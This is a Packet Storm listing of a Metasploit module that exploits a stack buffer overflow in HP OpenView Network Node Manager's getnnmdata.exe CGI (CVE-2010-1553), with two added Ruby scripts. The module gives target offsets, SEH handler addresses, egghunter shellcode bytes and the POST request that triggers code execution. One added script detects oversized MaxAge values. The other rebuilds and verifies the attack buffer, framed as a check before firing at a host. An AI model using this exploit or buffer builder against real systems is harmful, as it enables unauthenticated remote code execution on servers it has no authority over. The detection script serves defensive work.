
HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow

Posted Mar 24, 2011
Authored by MC | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50 and 7.53. By sending a specially crafted MaxAge parameter to the getnnmdata.exe CGI (a POST to /OvCgi/getnnmdata.exe), an unauthenticated attacker may be able to execute arbitrary code; the module overwrites an SEH record and uses an egghunter to reach the payload.
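A detection check for the trigger described above, added here as an example; it is not part of the Packet Storm page or of the Metasploit module. It parses the query string and POST body of requests to /OvCgi/getnnmdata.exe and flags a MaxAge value that is oversized, non-numeric or carries non-printable bytes. The assumption that legitimate MaxAge values are short decimal integers (the name suggests a cache age), the 16-byte threshold, and the sample requests are all constructed for illustration; the form parser works on raw bytes so a body full of opcode bytes does not raise encoding errors.

```ruby
# Constructed example: flag suspicious MaxAge values sent to getnnmdata.exe.
# Not part of the Metasploit module; threshold and samples are assumptions.

GETNNMDATA_PATH = '/OvCgi/getnnmdata.exe'.freeze
MAX_SANE_MAXAGE_LEN = 16  # assumed: a real cache age is a short integer

# Decode one application/x-www-form-urlencoded token on raw bytes.
def unescape(s)
  s.b.tr('+', ' ').gsub(/%([0-9a-fA-F]{2})/n) { $1.hex.chr }
end

# Parse a form body into { name => [values] }, keeping repeated names.
def parse_form(raw)
  raw.to_s.b.split('&').each_with_object(Hash.new { |h, k| h[k] = [] }) do |pair, h|
    key, val = pair.split('=', 2)
    next if key.nil? || key.empty?
    h[unescape(key)] << unescape(val.to_s)
  end
end

# Returns an array of findings for one request, or nil if nothing is suspicious.
# Both the query string and the body are inspected whatever the method.
def inspect_request(method:, uri:, body:)
  path, query = uri.split('?', 2)
  return nil unless path == GETNNMDATA_PATH
  params = parse_form(query)
  parse_form(body).each { |k, v| params[k].concat(v) }
  findings = []
  params['MaxAge'].each do |v|
    findings << "MaxAge length #{v.bytesize} exceeds #{MAX_SANE_MAXAGE_LEN}" if v.bytesize > MAX_SANE_MAXAGE_LEN
    findings << 'MaxAge is not a decimal integer' unless v.match?(/\A\d+\z/n)
    findings << 'MaxAge contains non-printable bytes' if v.match?(/[^\x20-\x7e]/n)
  end
  findings.empty? ? nil : findings.uniq
end

# Scan a list of requests; returns [[index, findings], ...] for the flagged ones.
def scan_requests(requests)
  requests.each_with_index.map { |req, i| (f = inspect_request(**req)) ? [i, f] : nil }.compact
end

# Constructed sample traffic: a benign call, a request shaped like the module's
# 7.53 buffer (padding, nSEH jump, handler address), a benign GET, and a
# repeated parameter where only the second value is hostile.
SAMPLE_REQUESTS = [
  { method: 'POST', uri: GETNNMDATA_PATH, body: 'SnmpVals=&MaxAge=300' },
  { method: 'POST', uri: GETNNMDATA_PATH,
    body: 'SnmpVals=&MaxAge=' + ('A' * 2054) + "\xeb\x06AA\x69\x6d\x66\x5a".b },
  { method: 'GET', uri: GETNNMDATA_PATH + '?MaxAge=300', body: '' },
  { method: 'POST', uri: GETNNMDATA_PATH, body: 'MaxAge=300&MaxAge=' + ('A' * 100) },
].freeze

if $PROGRAM_NAME == __FILE__
  scan_requests(SAMPLE_REQUESTS).each { |i, f| puts "request #{i}: #{f.join('; ')}" }
end
```

The parser deliberately avoids CGI.parse, which would force a UTF-8 encoding onto the value and raise on the first invalid byte of an egghunter; a detector that crashes on the attacker's bytes is not a detector.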

tags | exploit, overflow, arbitrary, cgi
advisories | CVE-2010-1553
SHA-256 | 80ff73419a7cd13d7e21eb8ec7e33cd16805fe4f27fb6954c76a5d837fa3bf7f

##
# $Id: hp_nnm_getnnmdata_maxage.rb 12117 2011-03-23 21:57:16Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  # Version-independent fingerprint: a HEAD against the CGI returns a page that
  # carries the HP copyright string.
  HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.
        By sending a specially crafted MaxAge parameter to the getnnmdata.exe CGI,
        an attacker may be able to execute arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 12117 $',
      'References'     =>
        [
          [ 'CVE', '2010-1553' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 750,
          'BadChars' => "\x00",
          # GetPC stub: jmp +3 / pop ecx / jmp +5 / call -8. The call pushes the
          # address of the bytes that follow it, so ECX ends up pointing at the
          # start of the encoded payload, which is what the alphanumeric decoder
          # below expects in BufferRegister.
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
          # No NOP sled: the egghunter jumps straight to the payload.
          'DisableNops'    => 'True',
          'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ECX',
            },
        },
      'Platform'       => 'win',
      # Offset is the distance to the SEH record; Ret is a pop/pop/ret address
      # with no null bytes. Both differ between the two builds.
      'Targets'        =>
        [
          [ 'HP OpenView Network Node Manager 7.50', { 'Offset' => 7591, 'Ret' => 0x5a01f277 } ],
          [ 'HP OpenView Network Node Manager 7.53', { 'Offset' => 2054, 'Ret' => 0x5a666d69 } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 11 2010'))

    register_options( [ Opt::RPORT(80) ], self.class )
  end

  def exploit

    # Four-byte tag that marks the start of the payload in memory.
    egg = rand_text_alpha_upper(4)

    # skape's NtAccessCheckAndAuditAlarm egghunter (int 0x2e, syscall 2): walks
    # memory a page at a time, skipping unmapped pages, until it finds the tag
    # twice in a row (scasd / jnz / scasd / jnz), then jumps to what follows.
    hunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    hunter << "\xef\xb8" + egg + "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

    # Layout of the MaxAge value:
    #   [padding to Offset][nSEH jump + SEH handler][hunter][egg][egg][payload][filler]
    # The nSEH short jump lands in the hunter once the handler (pop/pop/ret) fires.
    boom = rand_text_alpha_upper(target['Offset'])
    boom << generate_seh_record(target.ret)
    boom << hunter + egg + egg
    boom << payload.encoded
    # Keep payload plus filler at a fixed 9024 bytes regardless of payload size.
    boom << rand_text_alpha_upper(9024 - payload.encoded.length)

    # The hunter bytes are sent raw in the form body, not URL-encoded.
    sploit = "SnmpVals=&MaxAge=#{boom}"

    print_status("Trying target #{target.name}...")

    send_request_cgi({
      'uri'    => '/OvCgi/getnnmdata.exe',
      'method' => 'POST',
      'data'   => sploit
    }, 8)

    handler

  end

end
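An offline reconstruction of the buffer the module's exploit method builds, added here as an example and not part of the Metasploit module. It exists to answer the questions an operator checks before firing an SEH exploit at a host: does the handler address land exactly at Offset+4, does the egghunter's tag pair sit right after the 32-byte hunter, does the finished buffer contain any byte from BadChars, and is the total length what the layout predicts. The SEH record builder is a simplified stand-in for the Seh mixin's generate_seh_record (assumed layout: a 2-byte short jump plus two junk bytes for nSEH, then the little-endian handler address), the payload is a constructed placeholder of alpha-upper bytes in place of encoded shellcode, and the check names are this example's own.

```ruby
# Constructed example: rebuild and verify the MaxAge buffer layout used by the
# module, without the Msf framework. Offsets and handler addresses are the
# module's own; the SEH record builder and the placeholder payload are assumptions.

TARGETS = {
  '7.50' => { offset: 7591, ret: 0x5a01f277 },
  '7.53' => { offset: 2054, ret: 0x5a666d69 },
}.freeze

BAD_CHARS     = "\x00".b.freeze
PAYLOAD_SPACE = 750
TRAILER_SIZE  = 9024   # payload + filler, as in the module
HUNTER_SIZE   = 32
UPPER         = ('A'..'Z').to_a.freeze

def alpha_upper(n)
  Array.new(n) { UPPER.sample }.join.b
end

# skape's NtAccessCheckAndAuditAlarm egghunter, byte for byte as in the module,
# with the 4-byte tag embedded in the mov eax, imm32 at offset 18.
def egghunter(tag)
  hunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74".b
  hunter << "\xef\xb8".b << tag.b << "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7".b
end

# Assumed stand-in for generate_seh_record: nSEH = jmp short +6 over the
# handler pointer, then the handler address little-endian.
def seh_record(ret)
  "\xeb\x06".b + alpha_upper(2) + [ret].pack('V')
end

# Build the MaxAge value: padding, SEH record, hunter, tag pair, payload, filler.
def build_maxage(offset:, ret:, payload: alpha_upper(PAYLOAD_SPACE))
  raise ArgumentError, 'payload exceeds Space' if payload.bytesize > PAYLOAD_SPACE
  tag = alpha_upper(4)
  buf = alpha_upper(offset)
  buf << seh_record(ret)
  buf << egghunter(tag) << tag << tag
  buf << payload.b
  buf << alpha_upper(TRAILER_SIZE - payload.bytesize)
  { buffer: buf, tag: tag }
end

# The form body the module posts; the hunter bytes go out raw, not URL-encoded.
def post_body(buf)
  'SnmpVals=&MaxAge='.b + buf
end

# Layout checks. Returns an array of problems; empty means the buffer is sane.
def check_layout(buf, tag, offset:, ret:)
  problems = []
  problems << 'ret not at offset+4' unless buf.byteslice(offset + 4, 4) == [ret].pack('V')
  hunter_start = offset + 8
  problems << 'egg tag not embedded in hunter' unless buf.byteslice(hunter_start + 18, 4) == tag
  problems << 'egg tag pair not after hunter' unless buf.byteslice(hunter_start + HUNTER_SIZE, 8) == tag * 2
  BAD_CHARS.each_byte do |b|
    problems << format('bad char 0x%02x present', b) if buf.include?(b.chr)
  end
  expected = offset + 8 + HUNTER_SIZE + 8 + TRAILER_SIZE
  problems << "length #{buf.bytesize} != #{expected}" unless buf.bytesize == expected
  problems
end

if $PROGRAM_NAME == __FILE__
  TARGETS.each do |ver, t|
    r = build_maxage(offset: t[:offset], ret: t[:ret])
    problems = check_layout(r[:buffer], r[:tag], offset: t[:offset], ret: t[:ret])
    puts "#{ver}: #{problems.empty? ? 'layout ok' : problems.join(', ')} (#{post_body(r[:buffer]).bytesize} bytes)"
  end
end
```

The bad-char check is the one most worth keeping: a handler address with a zero byte passes every other test and still fails on the target, because BadChars declares "\x00" for a reason, and the check catches it before the request leaves the box.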